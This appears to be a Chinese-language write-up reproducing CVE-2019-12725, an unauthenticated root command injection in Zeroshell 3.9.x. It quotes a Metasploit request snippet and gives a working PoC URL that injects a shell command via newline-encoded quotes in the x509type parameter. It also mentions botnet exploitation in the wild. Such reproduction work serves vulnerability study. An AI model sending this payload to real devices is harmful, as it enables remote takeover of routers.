CVE-2019-12725 zeroshell_RCE漏洞复现

简介

官网：https://www.zeroshell.org/

目前该项目依旧停止更新，最后一个版本是3.9.5

Zeroshell 是一个微型的linux发行版本，它功能强大，具有强大的router、radius、web门户、防火墙、virtual**、Qos、 DHCP、dns转发等功能，可以用来安装到服务器上为内网提供网络服务，而且安装和使用都很方便，有U盘，Live CD和Flash imgage文件用于安装，可以使用web界面进行设置和管理。想自己部署软路由，又不想编译，找驱动程序，或者别人编译的固件有后门，可以考虑用Zeroshell替代Openwrt/LEDE。

总的来说Zeroshell的特性包括：负载均衡及多网络连接的失效转移，通过3G调制解调器的UMTS/HSDPA连接，用于提供安全认证和无线网络加密密钥自动管理的RADIUS服务器，用于支持网页登录的强制网络门户（商场和酒店等商用场景），以及很多其他内容。

漏洞简介

在CVE搜索，发现历史上四个漏洞，目前网络上复现最多的是CVE-2019-12725，这个POC是被收录进了MSF的。

link：https://cve.mitre.org/cgi-bin/cvekey.cgi?keyword=zeroshell

17.png

POC1

网络上目前的POC如下，是根据EXP DATABASE写的

peiqi给的poc也是根据此而来

link：http://wiki.peiqi.tech/wiki/iot/ZeroShell/ZeroShell%203.9.0%20%E8%BF%9C%E7%A8%8B%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E%20CVE-2019-12725.html

2.png

link：ZeroShell 3.9.0 - 'cgi-bin/kerbynet' Remote Root Command Injection (Metasploit) - Linux webapps Exploit (exploit-db.com)

# 这是exp database中的
res = send_request_cgi(
      'method' => 'GET',
      'uri'    => '/cgi-bin/kerbynet',
      'encode_params' => false,
      'vars_get' => {
        'Action' => 'x509view',
        'Section' => 'NoAuthREQ',
        'User' => '',
        'x509type' => command_payload
      }
    )
    
#POC
/cgi-bin/kerbynet?Action=x509view&Section=NoAuthREQ&User=&x509type=%27%0Aid%0A%27

3.png

但是实际上对User字段随意赋值或者将其直接删除也可执行成功

5.png 4.png

POC2

此特征存在在野利用，被Gafgyt僵尸网络家族利用，具体参考

https://www.freebuf.com/articles/system/247940.html

https://twitter.com/sans_isc/status/1284906234722881541

这个图片就是从流量中发现的利用，我尝试了这个poc但未复现成功，有成功的师傅交流下

6.png